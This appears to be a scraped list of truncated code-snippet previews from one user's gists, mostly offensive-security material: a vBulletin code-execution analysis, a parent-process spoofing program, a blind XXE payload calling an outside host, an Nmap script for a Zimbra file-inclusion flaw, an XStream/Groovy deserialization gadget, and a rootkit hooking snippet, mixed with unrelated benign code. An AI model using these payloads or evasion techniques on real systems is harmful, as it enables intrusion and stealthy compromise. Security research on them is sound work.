JohnTroony

I have done some preliminary research into this bug and so far it does not seem like a backdoor. Just some really weird logic when handling routes, and rendering templates.

As to why widgetConfig[code] executes via a POST request, it is because of the following code located in /includes/vb5/frontend/applicationlight.php


$serverData = array_merge($_GET, $_POST);

if (!empty($this->application['handler']) AND method_exists($this, $this->application['handler']))
{
    $app = $this->application['handler'];

JohnTroony

/* x86-64-w64-mingw32-gcc process_spoof.c -o spoof.exe */
/* spoof.exe explorer.exe calc.exe */
#include <windows.h>
#include <tlhelp32.h>

#define PROC_THREAD_ATTRIBUTE_PARENT_PROCESS 0x00020000

typedef struct _STARTUPINFOEX {
  STARTUPINFO                 StartupInfo;
  LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList;

JohnTroony

--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

JohnTroony

local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local vulns = require "vulns"

description = [[
A 0 day was been released on the 6th december 2013 by rubina119, and was patched in Zimbra 7.2.6.

The vulnerability is a local file inclusion that can retrieve any file from the server.

JohnTroony

// Compile with -std=c11

#include <stdlib.h>
#include <stdarg.h>
#include <stdio.h>
#include <inttypes.h>
#include <string.h>
#include <limits.h>

#define MAX_STR_LEN 4095

JohnTroony

<map>
  <entry>
    <groovy.util.Expando>
      <expandoProperties>
        <entry>
          <string>hashCode</string>
          <org.codehaus.groovy.runtime.MethodClosure>
            <delegate class="groovy.util.Expando" reference="../../../.."/>
            <owner class="java.lang.ProcessBuilder">
              <command>

JohnTroony

- name: DO
  hosts: localhost
  vars:
    project_name: "PUT A NAME FOR YOUR PROJECT HERE"
    do_token: "PUT YOUR DIGITAL OCEAN API KEY HERE ==> https://cloud.digitalocean.com/settings/api/tokens"
    repository: "PUT YOUR REPOSITORY URL HERE"

  tasks:
    - name: LOCAL | Generate SSH key
      shell: ssh-keygen -b 2048 -t rsa -f ~/.ssh/{{project_name}} -q -N ""

JohnTroony

from idaapi import *

# with code taken from http://hexblog.com/idapro/vmware_modules.py

class LoadedModulesList(Choose2):

    def __init__(self, title, flags=0, width=None, height=None, embedded=False, modal=False):
        self.ptr = get_name_ea_simple("PsLoadedModuleList")
        if self.ptr == BADADDR:
          raise ValueError('Missing symbol: PsLoadedModuleList')

JohnTroony

#include <windows.h>
#include <stdio.h>


FARPROC fpCreateProcessW;
BYTE bSavedByte;

// Blog Post Here:
// https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108
// tasklist | findstr explore.exe

JohnTroony

/*
 * Kernel-based Virtual Machine driver for Linux
 *
 * This module enables machines with Intel VT-x extensions to run virtual
 * machines without emulation or binary translation.
 *
 * Copyright (C) 2006 Qumranet, Inc.
 * Copyright 2010 Red Hat, Inc. and/or its affiliates.
 *
 * Authors: